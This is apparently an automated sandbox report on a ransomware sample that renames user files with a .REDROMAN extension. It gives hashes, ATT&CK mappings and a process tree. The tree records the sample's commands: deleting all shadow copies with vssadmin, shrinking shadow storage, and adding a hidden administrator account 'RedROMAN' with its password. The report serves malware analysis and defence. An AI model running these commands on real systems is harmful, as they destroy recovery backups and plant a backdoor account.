f0fbd0654d4bf299c08f1f83e7b6c3a1f332b49c24b3cf0b9b87757b8c13f093

General

Target

f0fbd0654d4bf299c08f1f83e7b6c3a1f332b49c24b3cf0b9b87757b8c13f093.bin.sample.exe
Size

1.8MB
MD5

10d7151b9ee53b8da8ee6f85001ffb20
SHA1

76d33ef58ea7b012342d975d871db64840da9675
SHA256

f0fbd0654d4bf299c08f1f83e7b6c3a1f332b49c24b3cf0b9b87757b8c13f093
SHA512

1c6d2d7f509b462b5d48db61817ee42a7204d10141c59394eb190d0dba733b831a6344bb85197dfac358939379e640c9f38732d376e28f92e187806ca574d10f

Score

9^/10

persistence ransomware

Malware Config

Signatures

Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

Modifies extensions of user files 10 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

Processes:

f0fbd0654d4bf299c08f1f83e7b6c3a1f332b49c24b3cf0b9b87757b8c13f093.bin.sample.exe

description	ioc	process
File opened for modification	C:\Users\Admin\Pictures\RemoveInstall.tiff	f0fbd0654d4bf299c08f1f83e7b6c3a1f332b49c24b3cf0b9b87757b8c13f093.bin.sample.exe
File created	C:\Users\Admin\Pictures\SplitUnregister.raw.REDROMAN	f0fbd0654d4bf299c08f1f83e7b6c3a1f332b49c24b3cf0b9b87757b8c13f093.bin.sample.exe
File opened for modification	C:\Users\Admin\Pictures\EditRevoke.tiff	f0fbd0654d4bf299c08f1f83e7b6c3a1f332b49c24b3cf0b9b87757b8c13f093.bin.sample.exe
File created	C:\Users\Admin\Pictures\EditRevoke.tiff.REDROMAN	f0fbd0654d4bf299c08f1f83e7b6c3a1f332b49c24b3cf0b9b87757b8c13f093.bin.sample.exe
File created	C:\Users\Admin\Pictures\BlockTest.tiff.REDROMAN	f0fbd0654d4bf299c08f1f83e7b6c3a1f332b49c24b3cf0b9b87757b8c13f093.bin.sample.exe
File created	C:\Users\Admin\Pictures\ExportRestore.tif.REDROMAN	f0fbd0654d4bf299c08f1f83e7b6c3a1f332b49c24b3cf0b9b87757b8c13f093.bin.sample.exe
File created	C:\Users\Admin\Pictures\ConfirmInstall.crw.REDROMAN	f0fbd0654d4bf299c08f1f83e7b6c3a1f332b49c24b3cf0b9b87757b8c13f093.bin.sample.exe
File created	C:\Users\Admin\Pictures\RemoveInstall.tiff.REDROMAN	f0fbd0654d4bf299c08f1f83e7b6c3a1f332b49c24b3cf0b9b87757b8c13f093.bin.sample.exe
File created	C:\Users\Admin\Pictures\GroupReceive.crw.REDROMAN	f0fbd0654d4bf299c08f1f83e7b6c3a1f332b49c24b3cf0b9b87757b8c13f093.bin.sample.exe
File opened for modification	C:\Users\Admin\Pictures\BlockTest.tiff	f0fbd0654d4bf299c08f1f83e7b6c3a1f332b49c24b3cf0b9b87757b8c13f093.bin.sample.exe

Drops startup file 1 IoCs

Processes:

f0fbd0654d4bf299c08f1f83e7b6c3a1f332b49c24b3cf0b9b87757b8c13f093.bin.sample.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OPENTHIS.html	f0fbd0654d4bf299c08f1f83e7b6c3a1f332b49c24b3cf0b9b87757b8c13f093.bin.sample.exe

Modifies service 2 TTPs 5 IoCs

persistence

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

vssvc.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\SwProvider_{b5946137-7b9f-4925-af80-51abd60b20d5}	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer	vssvc.exe

Interacts with shadow copies 2 TTPs 2 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Processes:

vssadmin.exevssadmin.exe

pid process

4156 vssadmin.exe
4388 vssadmin.exe
Modifies registry class 1 IoCs

Processes:

powershell.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings powershell.exe
Runs net.exe
Suspicious behavior: EnumeratesProcesses 6 IoCs

Processes:

powershell.exepowershell.exe

pid process

2768 powershell.exe
2768 powershell.exe
2768 powershell.exe
3972 powershell.exe
3972 powershell.exe
3972 powershell.exe

pid	process
4156	vssadmin.exe
4388	vssadmin.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings	powershell.exe

pid	process
2768	powershell.exe
2768	powershell.exe
2768	powershell.exe
3972	powershell.exe
3972	powershell.exe
3972	powershell.exe

Suspicious use of AdjustPrivilegeToken 5 IoCs

Processes:

powershell.exepowershell.exevssvc.exe

description	pid	process
Token: SeDebugPrivilege	2768	powershell.exe
Token: SeDebugPrivilege	3972	powershell.exe
Token: SeBackupPrivilege	4244	vssvc.exe
Token: SeRestorePrivilege	4244	vssvc.exe
Token: SeAuditPrivilege	4244	vssvc.exe

Suspicious use of WriteProcessMemory 18 IoCs

Processes:

f0fbd0654d4bf299c08f1f83e7b6c3a1f332b49c24b3cf0b9b87757b8c13f093.bin.sample.exepowershell.execmd.exenet.exenet.exe

description	pid	process	target process
PID 3980 wrote to memory of 2768	3980	f0fbd0654d4bf299c08f1f83e7b6c3a1f332b49c24b3cf0b9b87757b8c13f093.bin.sample.exe	powershell.exe
PID 3980 wrote to memory of 2768	3980	f0fbd0654d4bf299c08f1f83e7b6c3a1f332b49c24b3cf0b9b87757b8c13f093.bin.sample.exe	powershell.exe
PID 3980 wrote to memory of 3972	3980	f0fbd0654d4bf299c08f1f83e7b6c3a1f332b49c24b3cf0b9b87757b8c13f093.bin.sample.exe	powershell.exe
PID 3980 wrote to memory of 3972	3980	f0fbd0654d4bf299c08f1f83e7b6c3a1f332b49c24b3cf0b9b87757b8c13f093.bin.sample.exe	powershell.exe
PID 3972 wrote to memory of 1504	3972	powershell.exe	cmd.exe
PID 3972 wrote to memory of 1504	3972	powershell.exe	cmd.exe
PID 1504 wrote to memory of 4156	1504	cmd.exe	vssadmin.exe
PID 1504 wrote to memory of 4156	1504	cmd.exe	vssadmin.exe
PID 1504 wrote to memory of 4388	1504	cmd.exe	vssadmin.exe
PID 1504 wrote to memory of 4388	1504	cmd.exe	vssadmin.exe
PID 1504 wrote to memory of 4420	1504	cmd.exe	net.exe
PID 1504 wrote to memory of 4420	1504	cmd.exe	net.exe
PID 4420 wrote to memory of 4440	4420	net.exe	net1.exe
PID 4420 wrote to memory of 4440	4420	net.exe	net1.exe
PID 1504 wrote to memory of 4464	1504	cmd.exe	net.exe
PID 1504 wrote to memory of 4464	1504	cmd.exe	net.exe
PID 4464 wrote to memory of 4480	4464	net.exe	net1.exe
PID 4464 wrote to memory of 4480	4464	net.exe	net1.exe

C:\Users\Admin\AppData\Local\Temp\f0fbd0654d4bf299c08f1f83e7b6c3a1f332b49c24b3cf0b9b87757b8c13f093.bin.sample.exe
"C:\Users\Admin\AppData\Local\Temp\f0fbd0654d4bf299c08f1f83e7b6c3a1f332b49c24b3cf0b9b87757b8c13f093.bin.sample.exe"
1⤵
- Modifies extensions of user files
- Drops startup file
- Suspicious use of WriteProcessMemory
PID:3980

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -WindowStyle Hidden get-wmiobject win32_computersystem | "fl model"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2768

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" Start-Process C:\ProgramData\amdkey.bat -Verb runas
2⤵
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3972

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\ProgramData\amdkey.bat"
3⤵
- Suspicious use of WriteProcessMemory
PID:1504

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /All /Quiet
4⤵
- Interacts with shadow copies
PID:4156

C:\Windows\system32\vssadmin.exe
vssadmin.exe Resize ShadowStorage /For=C: /On=C: /MaxSize=320MB
4⤵
- Interacts with shadow copies
PID:4388

C:\Windows\system32\net.exe
net user /add RedROMAN p4zzaub71h
4⤵
- Suspicious use of WriteProcessMemory
PID:4420

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user /add RedROMAN p4zzaub71h
5⤵
PID:4440

C:\Windows\system32\net.exe
net localgroup administrators RedROMAN /add
4⤵
- Suspicious use of WriteProcessMemory
PID:4464

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 localgroup administrators RedROMAN /add
5⤵
PID:4480

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Modifies service
- Suspicious use of AdjustPrivilegeToken
PID:4244

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Account Manipulation

1

T1098

Modify Existing Service

1

T1031

Privilege Escalation

Defense Evasion

File Deletion

2

T1107

Modify Registry

1

T1112

Credential Access

Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Inhibit System Recovery

2

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\amdkey.bat
MD5
e1ccfa2c9fccc3306d6a2beafee97e88

SHA1
769a6f5692364611fb1c97b7f8909e305df46b0c

SHA256
8c6a13f418d0c11640ea15a0c42a4edc9f4175c4c924573c35b86929a7d25aaf

SHA512
f5ecf42ded57faa60cd98f7e43438c7b7158afb7061b836805469840880ae6b980dfe99f66bce8b52f2fa27eb0d07a48631da8f8fb82a3f12754a2024d70460c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
MD5
8a313b70fd641fc4e6fffb40391d0b4d

SHA1
22684fe19ecd7943ac18e622db0d7f161db500e8

SHA256
bd33eb064e32cf8d9af160e3304d3f0e1b90bdc9ab5116c16ba87d9a14060911

SHA512
5b72cd7e301ad3825bf1465840f52abb885c2481700df5dfa299c30aa6b61613dac8fc1386895cffec48b8229cba77085f672a80e42d7fd07c73eafd962e1246

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
769b9090275dbfc6ccfe5497dbddcf83

SHA1
974269a492394ec6fb9990990b01aefd6bb88247

SHA256
eeec5d3a1d83e84b995ec9827d1cd2242fedfcbff1c9778b31cdede0879f515a

SHA512
3c53d3557f51be12c6446971644569ebf7f0f43e66f8a778e0a0682c9c9abccb5c01e956c11ef67e071d70e7dda95374da89b439de31ca18594aff8e04303cbc

Download Submit
memory/1504-12-0x0000000000000000-mapping.dmp

Download
memory/2768-4-0x00000236EC530000-0x00000236EC531000-memory.dmp

Filesize
4KB

Download
memory/2768-3-0x00000236E9A00000-0x00000236E9A01000-memory.dmp

Filesize
4KB

Download
memory/2768-2-0x00007FFF6D540000-0x00007FFF6DF2C000-memory.dmp

Filesize
9.9MB

Download
memory/2768-1-0x0000000000000000-mapping.dmp

Download
memory/3972-5-0x0000000000000000-mapping.dmp

Download
memory/3972-7-0x00007FFF6D540000-0x00007FFF6DF2C000-memory.dmp

Filesize
9.9MB

Download
memory/3980-0-0x00007FF66EB10000-0x00007FF66ECE1000-memory.dmp

Filesize
1.8MB

Download
memory/4156-13-0x0000000000000000-mapping.dmp

Download
memory/4388-14-0x0000000000000000-mapping.dmp

Download
memory/4420-15-0x0000000000000000-mapping.dmp

Download
memory/4440-16-0x0000000000000000-mapping.dmp

Download
memory/4464-17-0x0000000000000000-mapping.dmp

Download
memory/4480-18-0x0000000000000000-mapping.dmp

Download

Resubmissions

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads